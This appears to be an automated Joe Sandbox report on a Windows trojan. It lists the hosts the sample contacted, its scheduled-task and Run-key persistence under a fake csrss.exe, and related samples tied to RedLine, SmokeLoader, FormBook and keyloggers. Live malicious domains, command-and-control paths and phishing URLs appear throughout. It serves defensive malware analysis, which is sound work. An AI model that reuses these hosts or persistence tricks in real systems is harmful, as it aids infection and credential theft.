http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10ResponseD	AppLaunch.exe, 00000009.00000002.2381658030.0000000006A35000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2381658030.0000000006737000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://outlook.com_	explorer.exe, 00000001.00000000.1796028449.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	low
http://tempuri.org/Entity/Id5Response	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id15ResponseD	AppLaunch.exe, 00000009.00000002.2381658030.0000000006A4C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2381658030.0000000006737000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003796000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id10Response	AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id8Response	AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.micro	explorer.exe, 00000001.00000000.1791731146.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1794142141.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1792259735.0000000008720000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id13Response	AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.198.2.251	snukerukeutit.org	United States	15169	GOOGLEUS	false
198.50.191.95	unknown	Canada	16276	OVHFR	false
142.44.187.223	unknown	Canada	16276	OVHFR	false
213.171.212.244	gco.uk	United Kingdom	8560	ONEANDONE-ASBrauerstrasse48DE	true
34.94.245.237	sumagulituyo.org	United States	15169	GOOGLEUS	false
95.214.26.17	unknown	Germany	33657	CMCSUS	true
15.197.142.173	m7l.com	United States	7430	TANDEMUS	true
157.7.44.163	mx.hetemail.jp	Japan	7506	INTERQGMOInternetIncJP	true
192.99.158.243	onlist.com	Canada	16276	OVHFR	false
64.190.63.111	a5a.com	United States	11696	NBS11696US	true
91.107.214.206	mail.h-email.net	Germany	24940	HETZNER-ASDE	true
175.126.109.15	atozrental.cc	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
194.63.248.47	z-a.com	Norway	12996	DOMENESHOPOsloNorwayNO	true
194.49.94.77	unknown	unknown	42707	EQUEST-ASNL	true
67.21.93.254	i.17986.net	United States	46844	ST-BGPUS	true
104.238.144.219	nrnet.com	United States	20473	AS-CHOOPAUS	true
172.253.122.14	gmr-smtp-in.l.google.com	United States	15169	GOOGLEUS	false
104.247.82.52	ftp.cm.cz	Canada	206834	TEAMINTERNET-CA-ASCA	true
45.32.206.101	mail.nrnet.com	United States	20473	AS-CHOOPAUS	true
54.209.32.212	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	false
91.215.85.17	stualialuyastrelia.net	Russian Federation	34665	PINDC-ASRU	true
185.244.24.40	unknown	Netherlands	57944	IPC-ASUA	false
15.197.172.60	1.tv	United States	7430	TANDEMUS	true
34.143.166.163	lightseinsteniki.org	United States	2686	ATGS-MMD-ASUS	true
13.248.169.48	ct.ated.net	United States	16509	AMAZON-02US	true
123.140.161.243	humydrole.com	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
5.161.133.13	mail.mailerhost.net	Germany	24940	HETZNER-ASDE	true
216.69.141.81	smtp.secureserver.net	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	false
3.94.41.167	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	false
3.64.163.50	ftp.gcann.cr.co.uk	United States	16509	AMAZON-02US	true
142.251.179.26	aspmx.l.google.com	United States	15169	GOOGLEUS	false
89.58.5.0	unknown	Germany	5430	FREENETDEfreenetDatenkommunikationsGmbHDE	false
199.59.243.225	mail.ia.eu	United States	395082	BODIS-NJUS	true
15.197.204.56	ftp.96l.com	United States	7430	TANDEMUS	true
104.21.79.229	2no.co	United States	13335	CLOUDFLARENETUS	false
68.183.34.12	mailgate.hul.co.uk	United States	14061	DIGITALOCEAN-ASNUS	true
37.191.206.197	unknown	Norway	57963	LYNET-INTERNETT-ASNO	false
3.33.224.147	hna.be	United States	8987	AMAZONEXPANSIONGB	true
157.7.44.171	gmaso.com	Japan	7506	INTERQGMOInternetIncJP	true
216.37.42.12	ftp.noweco.com	United States	17054	AS17054US	true
62.210.105.46	unknown	France	12876	OnlineSASFR	false
145.14.30.248	ftp.san.ee	Estonia	2586	UNINET-ASSoprusepst145FI	true

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1350471
Start date and time:	2023-11-30 11:18:04 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@47/38@2900/43
EGA Information:	Successful, ratio: 88.9%
HCA Information:	Successful, ratio: 59% Number of executed functions: 188 Number of non-executed functions: 55
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 50E3.exe, PID 5000 because there are no executed function
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:19:27	Task Scheduler	Run new task: Firefox Default Browser Agent C7432B34175EB70E path: C:\Users\user\AppData\Roaming\vahvrsu
10:20:00	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CSRSS "C:\ProgramData\Drivers\csrss.exe"
10:20:07	Task Scheduler	Run new task: SystemCheck path: "%userprofile%\AppData\Roaming\Microsoft\Windows\Helper.exe" s>-SystemCheck
10:20:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CSRSS "C:\ProgramData\Drivers\csrss.exe"
10:20:29	Task Scheduler	Run new task: Firefox Default Browser Agent AE67939DBDC34791 path: C:\Users\user\AppData\Roaming\tdhvrsu
11:19:26	API Interceptor	342961x Sleep call for process: explorer.exe modified
11:19:48	API Interceptor	2x Sleep call for process: 38B4.exe modified
11:19:54	API Interceptor	54x Sleep call for process: AppLaunch.exe modified
11:20:01	API Interceptor	23x Sleep call for process: 4A1B.exe modified
11:20:37	API Interceptor	5637x Sleep call for process: 50E3.exe modified
11:20:48	API Interceptor	11784x Sleep call for process: csrss.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
198.50.191.95	run32dll.exe	Get hash	malicious	Unknown	Browse	198.50.191.95/tor/server/fp/1084200b44021d308ea4253f256794671b1d099a
95.214.26.17	file.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader, Socks5Systemz	Browse
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	RedLine	Browse
	CheatLab.exe	Get hash	malicious	RedLine	Browse
	rgTRPlTmIt.exe	Get hash	malicious	RedLine, SmokeLoader	Browse
	CheatLab.exe	Get hash	malicious	RedLine	Browse
	rlRiFBcuVa.exe	Get hash	malicious	RedLine, SmokeLoader, Xmrig	Browse
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	RedLine	Browse
	file.exe	Get hash	malicious	DarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	DarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	DarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse
	HygLi5xRT1.exe	Get hash	malicious	DarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse
15.197.142.173	mZoYf6Nezj.exe	Get hash	malicious	FormBook	Browse	www.shruvish.com/o07d/?txo8=+yjsZPgdlviEILy4h3v8d7I4Zby9TFTcO/r4xgxzi8IDICKDLgaFuVANvOa8VB+J9GWb&qPF=XvDXfbThHJLxaDup
	58l8BPvbLr.exe	Get hash	malicious	FormBook	Browse	www.alkemymedia.com/o6g2/?G8Ox3p=TcJYskQZJUzQKPbrB2cxRl9kId57yTXFVFYjHWTp5yRmnjhpjUrDIK2ABuSno9wjNn3z&qPf=9r4DB
	klWGq3yDcQ.exe	Get hash	malicious	Unknown	Browse	greenrworld.com/admin.php
	14020611jpg.exe	Get hash	malicious	FormBook, DBatLoader	Browse	www.chicagocarpetcleaneril.com/kmge/
	Prd_Raw_Material_Requisition.doc	Get hash	malicious	FormBook	Browse	www.alkemymedia.com/o6g2/?3fz=TcJYskQZVE3UKvTsD2cxRl9kId57yTXFVFAzbVPo9SRnnSNvkE6PeOOCCL+bzdEQCmiDyQ==&ArqLU=XJE0fB_pPx1
	E-dekont.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.monkeesofmurfreesboro.com/ay62/?Ep=nhRlHn&lfsd=LMaK1EYmE1riZX+dyXfO5diJjvXs2IeIfqPjEBH2GgYYODuxpft4kgAn2wcnwPhnkqbk
	#U00d6denmemi#U015f_#U00d6demelerin_Kapat#U0131lmas#U0131.exe	Get hash	malicious	FormBook	Browse	www.alterdpxlmarketing.com/gy14/?j2Jxo=YTjTk4IHn&02=J9/jgP9Re4KtuF0AsBPpjtalVscOAyQ/qvU9Qh627akK0Y3++VNxqCagaMddKEOxon78
	Statement_Pdf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.orlandosfencing.com/st58/?w2Jp=bQuCANzaOZ82Zm8k+AePt1HaZhBSxDxvAWHAW7Sl8Iqd0j9F5P8lOghMQAX+DIKClM5Q&RRc=nN90b2
	THP-20381508-2023NP.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.orlandosfencing.com/st58/?vT=bQuCANzaOZ82Zm8k+AePt1HaZhBSxDxvAWHAW7Sl8Iqd0j9F5P8lOghMQAX+DIKClM5Q&S2M8J8=RdEHspH0oFo8
	Receipt_91888_PDF.exe	Get hash	malicious	FormBook	Browse	www.emsculptcenterofne.com/he2a/?Ej=nhNBuRkoNWOxJDiZ227X18Db1Kxbenb5b3vHQO2tFDH+XtD98Je8GVRwkFt4AbcQeHAu&ohPd=S8q0RfV
	Receipt!!_PDF.exe	Get hash	malicious	FormBook	Browse	www.emsculptcenterofne.com/he2a/?qToT_p=MZutCv204d4XkF&6ltpe=nhNBuRlcN2LBUz/tqG7X18Db1Kxbenb5b3vHQO2tFDH+XtD98Je8GVRwkF5SAfIuZ1Yu
	file.exe	Get hash	malicious	FormBook	Browse	www.thequickstartpromptguide.com/u29r/?AxoLm=YbmsMXdDpvFqzCQbj5qW8doDfgPscxV66nSCBk5y4z+UOcebdhgrnZXNGQNV7EH0otJfqrgYWA==&bh=U4kp
	yKiQrfqhGv.exe	Get hash	malicious	FormBook	Browse	www.2816goldfinch.com/4hc5/?ARM8mN=1aQlJJA0XtSA3mmPcz3A13DQhChCZAjZwmZYbKxz88FxQriiwRvfB7iHnJRBFH94mXqC&nfoHn6=xDKpFX0P8
	TSMqgEMJLy.exe	Get hash	malicious	FormBook	Browse	www.alkemymedia.com/o6g2/?b8=TcJYskQZJUzQKPbrB2cxRl9kId57yTXFVFYjHWTp5yRmnjhpjUrDIK2ABuSno9wjNn3z&P2M=FfxDEtaXwPw8Hd
	EOQvIhNLzI.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.b2b-scaling.com/sy22/?Kbp=THODZXTPdJuXN&AR-=YgEuJ2/y8+NM8LzKoLTdOCga4jaEFLGz6KGdKwO7OIfCb1oLlz87HA8beCwtJFaO4c2zRoe35Q==
	0A1H1XTG0q.exe	Get hash	malicious	FormBook	Browse	www.ddbetting.com/ro12/?Lhdt3=hMzxxbkXia5RjnAlJaKzsXjiG5SdjoCmZm0mRTZiy05C1nCrhTC2iqR8bURqBWCyb3X1&VRNH=wBWhY2dHWxjPYx
	3Fip115gvy.exe	Get hash	malicious	FormBook	Browse	www.2816goldfinch.com/4hc5/?1bYL=1aQlJJA0XtSA3mmPcz3A13DQhChCZAjZwmZYbKxz88FxQriiwRvfB7iHnJdBWXx7/HqUsJGxAw==&5j=tFNxItah5B1Ppp8
	4XiBSHVMK9.exe	Get hash	malicious	FormBook	Browse	www.rentthecostume.net/ur25/?1bz=ofut_N&yPJdZZPp=QrpMr1O2XemmuZdDoXvyr40DmM3H346tbJKMMm9+nfWV/rcTx66c2EgpBhI7O4H9YKpBo2UrOg==
	MaMsKRmgXZ.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.ddbetting.com/ro12/?pR-=hMzxxbkXjK5UhHFUVKKzsXjiG5SdjoCmZm0mRTZiy05C1nCrhTC2iqR8bXRfdiWJf26x&Wx=ChSLGhh0Mn9TylKP
	SecuriteInfo.com.Trojan.Siggen21.37922.29840.21903.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.americanworldsolutions.com/fadc/?UtP8Mn=e9mV41RITM18Aqkrl7QsPtcrRCUpkBLJEbGO1JEHxiDhPEMbcomeM50J0Y9rfKyOcOPdrjVR0A==&Kzu=XbCpKji8

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lightseinsteniki.org	file.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader, Socks5Systemz	Browse	34.143.166.163
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader	Browse	34.143.166.163
	rgTRPlTmIt.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	34.143.166.163
	rlRiFBcuVa.exe	Get hash	malicious	RedLine, SmokeLoader, Xmrig	Browse	34.143.166.163
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	Raccoon Stealer v2, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	DarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	DarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	DarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	34.143.166.163
	HygLi5xRT1.exe	Get hash	malicious	DarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	DarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	34.143.166.163
	SucIRNE4mA.exe	Get hash	malicious	DarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	34.143.166.163
	INBV3avdn6.exe	Get hash	malicious	Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	34.143.166.163
	PZoOv1wsSF.exe	Get hash	malicious	DarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	34.143.166.163
	1Ze5CGqX6U.exe	Get hash	malicious	DarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	34.143.166.163
aspmx3.googlemail.com	Transcript.exe	Get hash	malicious	MyDoom	Browse	64.233.184.27
	x7RlIzQDk1.exe	Get hash	malicious	Unknown	Browse	142.250.152.27
	EwK95WVtzI.exe	Get hash	malicious	Pushdo	Browse	142.250.152.27
	IDzTyPghZg.exe	Get hash	malicious	Unknown	Browse	64.233.184.27
	g5oo6DQ4pd.exe	Get hash	malicious	Unknown	Browse	64.233.184.27
	newtpp.exe	Get hash	malicious	Phorpiex	Browse	74.125.200.27
	gEkl9O5tiu.exe	Get hash	malicious	Phorpiex	Browse	74.125.200.27
	Fb4J788TwD.exe	Get hash	malicious	MiMail	Browse	74.125.200.27
	ydbWyoxHsd.exe	Get hash	malicious	Unknown	Browse	142.250.150.27
	Readme.exe	Get hash	malicious	Unknown	Browse	142.250.147.26
	xSazPOlbWy.exe	Get hash	malicious	Amadey, RedLine, SmokeLoader	Browse	74.125.200.27
	SecuriteInfo.com.Win32.HLLM.MyDoom.54464.3216.exe	Get hash	malicious	MyDoom	Browse	74.125.200.27
	.exe	Get hash	malicious	MyDoom	Browse	142.250.150.27
	data.exe	Get hash	malicious	Unknown	Browse	74.125.200.27
	.exe	Get hash	malicious	MyDoom	Browse	74.125.200.26
	AHnFoINkgu.exe	Get hash	malicious	MyDoom	Browse	74.125.200.26
	file.log.exe	Get hash	malicious	Unknown	Browse	74.125.200.26
	data.log.exe	Get hash	malicious	Unknown	Browse	74.125.200.26
	message.elm.exe	Get hash	malicious	Unknown	Browse	74.125.200.27
	message.txt.exe	Get hash	malicious	Unknown	Browse	74.125.200.27

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OVHFR	Advice_Ref[GLV626201911].exe	Get hash	malicious	FormBook	Browse	192.99.101.236
	PO_965362756.exe	Get hash	malicious	Snake Keylogger	Browse	51.38.247.67
	Product_List.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	51.38.247.67
	facturas_y_datos_bancarios.PDF__________________________.exe	Get hash	malicious	Snake Keylogger	Browse	51.38.247.67
	Invoice_YA_2023.exe	Get hash	malicious	Snake Keylogger	Browse	51.38.247.67
	119.H36.029-Takim_Conta-29-11-2023.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	51.38.247.67
	Halkbank_Ekstre_20231129_532423_6373443.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	51.38.247.67
	3qMvBhkSeq.exe	Get hash	malicious	Snake Keylogger	Browse	51.38.247.67
	qI587Irgut.docx	Get hash	malicious	Unknown	Browse	94.23.87.34
	obaTzlGNzi.exe	Get hash	malicious	Xmrig, zgRAT	Browse	51.68.190.80
	8EbwkHzF0i.exe	Get hash	malicious	Xmrig, zgRAT	Browse	51.68.190.80
	SOA_291123.exe	Get hash	malicious	FormBook, NSISDropper	Browse	142.44.226.116
	rgTRPlTmIt.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	51.81.155.81
	http://www.meherald.com.au/	Get hash	malicious	Unknown	Browse	142.4.219.198
	https://w.fangthatsack.com/rc/a91581ead4	Get hash	malicious	Unknown	Browse	51.68.82.147
	SecuriteInfo.com.Win32.PWSX-gen.7145.3884.exe	Get hash	malicious	Snake Keylogger	Browse	51.38.247.67
	http://www.tropbikewall.art/?sl=5706540-e4d07&data1=Track1&data2=Track2&tag=M7306521088920387799&website=21505-85fb5adz&placement=21505	Get hash	malicious	Unknown	Browse	51.68.81.31
	http://www.tropbikewall.art/?sl=5706540-e4d07&data1=Track1&data2=Track2&tag=M7306521088920387799&website=21505-85fb5adz&placement=21505	Get hash	malicious	Unknown	Browse	51.68.82.147
	https://freenetflixaccoun6.blogspot.com/	Get hash	malicious	HTMLPhisher	Browse	149.56.240.130
	http://outlook.reactivar.msw3icr3136.iceiy.com/login.live.com_login_verify_credentials_outlook.html?i=3	Get hash	malicious	Unknown	Browse	51.222.239.230
OVHFR	Advice_Ref[GLV626201911].exe	Get hash	malicious	FormBook	Browse	192.99.101.236
	PO_965362756.exe	Get hash	malicious	Snake Keylogger	Browse	51.38.247.67
	Product_List.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	51.38.247.67
	facturas_y_datos_bancarios.PDF__________________________.exe	Get hash	malicious	Snake Keylogger	Browse	51.38.247.67
	Invoice_YA_2023.exe	Get hash	malicious	Snake Keylogger	Browse	51.38.247.67
	119.H36.029-Takim_Conta-29-11-2023.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	51.38.247.67
	Halkbank_Ekstre_20231129_532423_6373443.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	51.38.247.67
	3qMvBhkSeq.exe	Get hash	malicious	Snake Keylogger	Browse	51.38.247.67
	qI587Irgut.docx	Get hash	malicious	Unknown	Browse	94.23.87.34
	obaTzlGNzi.exe	Get hash	malicious	Xmrig, zgRAT	Browse	51.68.190.80
	8EbwkHzF0i.exe	Get hash	malicious	Xmrig, zgRAT	Browse	51.68.190.80
	SOA_291123.exe	Get hash	malicious	FormBook, NSISDropper	Browse	142.44.226.116
	rgTRPlTmIt.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	51.81.155.81
	http://www.meherald.com.au/	Get hash	malicious	Unknown	Browse	142.4.219.198
	https://w.fangthatsack.com/rc/a91581ead4	Get hash	malicious	Unknown	Browse	51.68.82.147
	SecuriteInfo.com.Win32.PWSX-gen.7145.3884.exe	Get hash	malicious	Snake Keylogger	Browse	51.38.247.67
	http://www.tropbikewall.art/?sl=5706540-e4d07&data1=Track1&data2=Track2&tag=M7306521088920387799&website=21505-85fb5adz&placement=21505	Get hash	malicious	Unknown	Browse	51.68.81.31
	http://www.tropbikewall.art/?sl=5706540-e4d07&data1=Track1&data2=Track2&tag=M7306521088920387799&website=21505-85fb5adz&placement=21505	Get hash	malicious	Unknown	Browse	51.68.82.147
	https://freenetflixaccoun6.blogspot.com/	Get hash	malicious	HTMLPhisher	Browse	149.56.240.130
	http://outlook.reactivar.msw3icr3136.iceiy.com/login.live.com_login_verify_credentials_outlook.html?i=3	Get hash	malicious	Unknown	Browse	51.222.239.230
ONEANDONE-ASBrauerstrasse48DE	DHL_Receipt_AWB811471018477.exe	Get hash	malicious	FormBook	Browse	217.160.0.118
	1C7B64935E81217C7A039843EF1356EF0CDE664A2AE82.exe	Get hash	malicious	AsyncRAT	Browse	82.165.74.190
	z1ORDENDECOMPRAURGENTEpdf.exe	Get hash	malicious	FormBook	Browse	217.160.0.51
	PURCHASE_INQUIRY.exe	Get hash	malicious	FormBook	Browse	217.160.0.118
	DHL_#AWB811471048477.exe	Get hash	malicious	FormBook	Browse	217.160.0.118
	5.exe	Get hash	malicious	FormBook, NSISDropper	Browse	74.208.236.78
	OCCT.exe	Get hash	malicious	BazaLoader, PrivateLoader	Browse	198.251.76.239
	PO88393.pdf.pif.exe	Get hash	malicious	FormBook	Browse	74.208.236.194
	DHL_Consignment_Details_pdf.exe	Get hash	malicious	FormBook	Browse	74.208.236.243
	27112023110107pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.160.0.27
	Qte1123.exe	Get hash	malicious	FormBook	Browse	217.160.0.131
